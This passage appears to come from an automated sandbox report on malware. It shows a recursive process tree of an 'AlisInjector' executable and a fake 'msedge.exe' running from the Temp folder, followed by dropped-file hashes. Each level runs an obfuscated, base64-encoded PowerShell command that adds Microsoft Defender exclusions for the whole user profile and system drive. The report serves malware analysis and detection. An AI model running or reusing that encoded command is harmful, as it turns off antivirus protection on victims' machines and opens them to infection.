                                                                                                                                                                                                                                                                                                                                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAYwBhACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHYAagBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAZABmACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGMAbgBnACMAPgA="
                                                                                                                                                                                                                                                                                                                                        46⤵
                                                                                                                                                                                                                                                                                                                                          PID:4400
                                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\msedge.exe
                                                                                                                                                                                                                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\msedge.exe"
                                                                                                                                                                                                                                                                                                                                          46⤵
                                                                                                                                                                                                                                                                                                                                            PID:3388
                                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\AlisInjector(x64).exe
                                                                                                                                                                                                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\AlisInjector(x64).exe"
                                                                                                                                                                                                                                                                                                                                            46⤵
                                                                                                                                                                                                                                                                                                                                              PID:4336
                                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                                                                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAYwBhACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHYAagBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAZABmACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGMAbgBnACMAPgA="
                                                                                                                                                                                                                                                                                                                                                47⤵
                                                                                                                                                                                                                                                                                                                                                  PID:2436
                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\msedge.exe
                                                                                                                                                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\msedge.exe"
                                                                                                                                                                                                                                                                                                                                                  47⤵
                                                                                                                                                                                                                                                                                                                                                    PID:4984
                                                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\AlisInjector(x64).exe
                                                                                                                                                                                                                                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\AlisInjector(x64).exe"
                                                                                                                                                                                                                                                                                                                                                    47⤵
                                                                                                                                                                                                                                                                                                                                                      PID:2152
                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                                                                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAYwBhACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHYAagBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAZABmACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGMAbgBnACMAPgA="
                                                                                                                                                                                                                                                                                                                                                        48⤵
                                                                                                                                                                                                                                                                                                                                                          PID:5188
                                                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\msedge.exe
                                                                                                                                                                                                                                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\msedge.exe"
                                                                                                                                                                                                                                                                                                                                                          48⤵
                                                                                                                                                                                                                                                                                                                                                            PID:7824
                                                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\AlisInjector(x64).exe
                                                                                                                                                                                                                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\AlisInjector(x64).exe"
                                                                                                                                                                                                                                                                                                                                                            48⤵
                                                                                                                                                                                                                                                                                                                                                              PID:1868
                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                                                                                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAYwBhACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHYAagBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAZABmACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGMAbgBnACMAPgA="
                                                                                                                                                                                                                                                                                                                                                                49⤵
                                                                                                                                                                                                                                                                                                                                                                  PID:6116
                                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\msedge.exe
                                                                                                                                                                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\msedge.exe"
                                                                                                                                                                                                                                                                                                                                                                  49⤵
                                                                                                                                                                                                                                                                                                                                                                    PID:6680
                                                                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\AlisInjector(x64).exe
                                                                                                                                                                                                                                                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\AlisInjector(x64).exe"
                                                                                                                                                                                                                                                                                                                                                                    49⤵
                                                                                                                                                                                                                                                                                                                                                                      PID:2376
                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                                                                                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAYwBhACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHYAagBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAZABmACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGMAbgBnACMAPgA="
                                                                                                                                                                                                                                                                                                                                                                        50⤵
                                                                                                                                                                                                                                                                                                                                                                          PID:60
                                                                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\msedge.exe
                                                                                                                                                                                                                                                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\msedge.exe"
                                                                                                                                                                                                                                                                                                                                                                          50⤵
                                                                                                                                                                                                                                                                                                                                                                            PID:1124
                                                                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\AlisInjector(x64).exe
                                                                                                                                                                                                                                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\AlisInjector(x64).exe"
                                                                                                                                                                                                                                                                                                                                                                            50⤵
                                                                                                                                                                                                                                                                                                                                                                              PID:4352
                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                                                                                                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAYwBhACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHYAagBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAZABmACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGMAbgBnACMAPgA="
                                                                                                                                                                                                                                                                                                                                                                                51⤵
                                                                                                                                                                                                                                                                                                                                                                                  PID:7572
                                                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\msedge.exe
                                                                                                                                                                                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\msedge.exe"
                                                                                                                                                                                                                                                                                                                                                                                  51⤵
                                                                                                                                                                                                                                                                                                                                                                                    PID:2684
                                                                                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\AlisInjector(x64).exe
                                                                                                                                                                                                                                                                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\AlisInjector(x64).exe"
                                                                                                                                                                                                                                                                                                                                                                                    51⤵
                                                                                                                                                                                                                                                                                                                                                                                      PID:1644
                                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                                                                                                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAYwBhACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHYAagBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAZABmACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGMAbgBnACMAPgA="
                                                                                                                                                                                                                                                                                                                                                                                        52⤵
                                                                                                                                                                                                                                                                                                                                                                                          PID:4284
                                                                                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\msedge.exe
                                                                                                                                                                                                                                                                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\msedge.exe"
                                                                                                                                                                                                                                                                                                                                                                                          52⤵
                                                                                                                                                                                                                                                                                                                                                                                            PID:908
                                                                                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\AlisInjector(x64).exe
                                                                                                                                                                                                                                                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\AlisInjector(x64).exe"
                                                                                                                                                                                                                                                                                                                                                                                            52⤵
                                                                                                                                                                                                                                                                                                                                                                                              PID:2664
                                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                                                                                                                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAYwBhACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHYAagBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAZABmACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGMAbgBnACMAPgA="
                                                                                                                                                                                                                                                                                                                                                                                                53⤵
                                                                                                                                                                                                                                                                                                                                                                                                  PID:7904
                                                                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\msedge.exe
                                                                                                                                                                                                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\msedge.exe"
                                                                                                                                                                                                                                                                                                                                                                                                  53⤵
                                                                                                                                                                                                                                                                                                                                                                                                    PID:4252
                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\AlisInjector(x64).exe
                                                                                                                                                                                                                                                                                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\AlisInjector(x64).exe"
                                                                                                                                                                                                                                                                                                                                                                                                    53⤵
                                                                                                                                                                                                                                                                                                                                                                                                      PID:6092
                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                                                                                                                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAYwBhACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHYAagBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAZABmACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGMAbgBnACMAPgA="
                                                                                                                                                                                                                                                                                                                                                                                                        54⤵
                                                                                                                                                                                                                                                                                                                                                                                                          PID:1656
                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\msedge.exe
                                                                                                                                                                                                                                                                                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\msedge.exe"
                                                                                                                                                                                                                                                                                                                                                                                                          54⤵
                                                                                                                                                                                                                                                                                                                                                                                                            PID:3520
                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\AlisInjector(x64).exe
                                                                                                                                                                                                                                                                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\AlisInjector(x64).exe"
                                                                                                                                                                                                                                                                                                                                                                                                            54⤵
                                                                                                                                                                                                                                                                                                                                                                                                              PID:5972
                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAYwBhACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHYAagBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAZABmACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGMAbgBnACMAPgA="
                                                                                                                                                                                                                                                                                                                                                                                                                55⤵
                                                                                                                                                                                                                                                                                                                                                                                                                  PID:384
                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\msedge.exe
                                                                                                                                                                                                                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\msedge.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                  55⤵
                                                                                                                                                                                                                                                                                                                                                                                                                    PID:5920
                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\AlisInjector(x64).exe
                                                                                                                                                                                                                                                                                                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\AlisInjector(x64).exe"
                                                                                                                                                                                                                                                                                                                                                                                                                    55⤵
                                                                                                                                                                                                                                                                                                                                                                                                                      PID:5976
                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAYwBhACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHYAagBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAZABmACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGMAbgBnACMAPgA="
                                                                                                                                                                                                                                                                                                                                                                                                                        56⤵
                                                                                                                                                                                                                                                                                                                                                                                                                          PID:6812
                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\msedge.exe
                                                                                                                                                                                                                                                                                                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\msedge.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                          56⤵
                                                                                                                                                                                                                                                                                                                                                                                                                            PID:4032
                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\AlisInjector(x64).exe
                                                                                                                                                                                                                                                                                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\AlisInjector(x64).exe"
                                                                                                                                                                                                                                                                                                                                                                                                                            56⤵
                                                                                                                                                                                                                                                                                                                                                                                                                              PID:4196
                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAYwBhACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHYAagBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAZABmACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGMAbgBnACMAPgA="
                                                                                                                                                                                                                                                                                                                                                                                                                                57⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:5544
                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\msedge.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\msedge.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                  57⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:5752
                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\AlisInjector(x64).exe
                                                                                                                                                                                                                                                                                                                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\AlisInjector(x64).exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                    57⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:6048
                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAYwBhACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHYAagBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAZABmACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGMAbgBnACMAPgA="
                                                                                                                                                                                                                                                                                                                                                                                                                                        58⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:6984
                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\msedge.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\msedge.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                          58⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:7252
                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\AlisInjector(x64).exe
                                                                                                                                                                                                                                                                                                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\AlisInjector(x64).exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                            58⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:7692
                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAYwBhACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHYAagBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAZABmACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGMAbgBnACMAPgA="
                                                                                                                                                                                                                                                                                                                                                                                                                                                59⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:5732
                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\msedge.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\msedge.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                  59⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:5884
                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\AlisInjector(x64).exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\AlisInjector(x64).exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                    59⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:3400
                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Roaming\XClient.exe
                                                                                                                                                                                                                                                                                                                                  C:\Users\Admin\AppData\Roaming\XClient.exe
                                                                                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                                                                                    PID:6552

                                                                                                                                                                                                                                                                                                                                  Network

                                                                                                                                                                                                                                                                                                                                  MITRE ATT&CK Enterprise v15

                                                                                                                                                                                                                                                                                                                                  Replay Monitor

                                                                                                                                                                                                                                                                                                                                  Loading Replay Monitor...

                                                                                                                                                                                                                                                                                                                                  Downloads

                                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\msedge.exe.log

                                                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                                                    654B

                                                                                                                                                                                                                                                                                                                                    MD5

                                                                                                                                                                                                                                                                                                                                    2ff39f6c7249774be85fd60a8f9a245e

                                                                                                                                                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                                                                                                                                                    684ff36b31aedc1e587c8496c02722c6698c1c4e

                                                                                                                                                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                                                                                                                                                    e1b91642d85d98124a6a31f710e137ab7fd90dec30e74a05ab7fcf3b7887dced

                                                                                                                                                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                                                                                                                                                    1d7e8b92ef4afd463d62cfa7e8b9d1799db5bf2a263d3cd7840df2e0a1323d24eb595b5f8eb615c6cb15f9e3a7b4fc99f8dd6a3d34479222e966ec708998aed1

                                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

                                                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                                                    2KB

                                                                                                                                                                                                                                                                                                                                    MD5

                                                                                                                                                                                                                                                                                                                                    968cb9309758126772781b83adb8a28f

                                                                                                                                                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                                                                                                                                                    8da30e71accf186b2ba11da1797cf67f8f78b47c

                                                                                                                                                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                                                                                                                                                    92099c10776bb7e3f2a8d1b82d4d40d0c4627e4f1bf754a6e58dfd2c2e97042a

                                                                                                                                                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                                                                                                                                                    4bd50732f8af4d688d95999bddfd296115d7033ddc38f86c9fb1f47fde202bffa27e9088bebcaa3064ca946af2f5c1ca6cbde49d0907f0005c7ab42874515dd3

                                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

                                                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                                                    53KB

                                                                                                                                                                                                                                                                                                                                    MD5

                                                                                                                                                                                                                                                                                                                                    124edf3ad57549a6e475f3bc4e6cfe51

                                                                                                                                                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                                                                                                                                                    80f5187eeebb4a304e9caa0ce66fcd78c113d634

                                                                                                                                                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                                                                                                                                                    638c51e173ca6b3469494a7e2e0b656021a761f77b4a83f3e430e82e7b9af675

                                                                                                                                                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                                                                                                                                                    b6c1a9051feeffad54ba1092fd799d34a9578368d7e66b31780fe478c1def0eb4094dce2879003f7389f2f9d86b94a3ef3975e78092a604597841c9b8db120ee

                                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                                                    18KB

                                                                                                                                                                                                                                                                                                                                    MD5

                                                                                                                                                                                                                                                                                                                                    a23e00a2f42d420cb1730ace1beebb79

                                                                                                                                                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                                                                                                                                                    a8c3939962e128bc5a15445e6a6c4ac3fc0d5457

                                                                                                                                                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                                                                                                                                                    8522da8c7563bf05623687c24c0b138d4703a7c82ffebfad60d90f19222d6cb4

                                                                                                                                                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                                                                                                                                                    78018229ce9a2bf76be514520eb9d38c5414b1dcc4598244f5a85755470337161b815d56977deefef4a0efc79107bc45917fcc9ed7054ae104fd55830218558f

                                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                                                    18KB

                                                                                                                                                                                                                                                                                                                                    MD5

                                                                                                                                                                                                                                                                                                                                    77b89658d13b3ae46330dc31b1625769

                                                                                                                                                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                                                                                                                                                    89b3af9691f39edb928175548cffada71028d052

                                                                                                                                                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                                                                                                                                                    b2974336a1f9c4942c1ead18d8356054853a4d14daa8d1249998e3db8c7a9964

                                                                                                                                                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                                                                                                                                                    b71765668578d7c9316e2bf7b3e560ab012595ce748d9bc6f2c167d3729251a46cdcf25b76b0446618a759c51bff048cbf6e8d99543debeac9d4e792d319df7a

                                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                                                    18KB

                                                                                                                                                                                                                                                                                                                                    MD5

                                                                                                                                                                                                                                                                                                                                    39781fdd0a5839cd10383f539411df04

                                                                                                                                                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                                                                                                                                                    a3519103aa18f011d9eae3b024bbb97e16a3e672

                                                                                                                                                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                                                                                                                                                    41356662932a4a61bfc9a280f177273d5aaa74fab1cc8118237c2eebc5c65b0a

                                                                                                                                                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                                                                                                                                                    8abe637729c8473ac7914d4f7f89d3ab9d0ed0eb6c15d480da106197cfdfeefcb61d979d290addfbe2499235bdc0c7d1168c870d3c0228cfc6516e9f565cab86

                                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                                                    18KB

                                                                                                                                                                                                                                                                                                                                    MD5

                                                                                                                                                                                                                                                                                                                                    c409bcd950e55b28dbe1fd1b9f917fa9

                                                                                                                                                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                                                                                                                                                    e25162cf5563bb106b108846d5caebf10ff93c50

                                                                                                                                                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                                                                                                                                                    67125a9ac42140796a76baa874c4aacb1f17f02bdb7f60073a2e78084f5458c9

                                                                                                                                                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                                                                                                                                                    aa3b07f0725b25c4c59945e35896aae9dafbfa385551ed1e458d31c5822fde5008dfd09d4d7af8e33c18be7498b8817fe89db2c820dc3bb007d387b647430213

                                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_agzgx1vy.i3q.ps1

                                                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                                                    60B

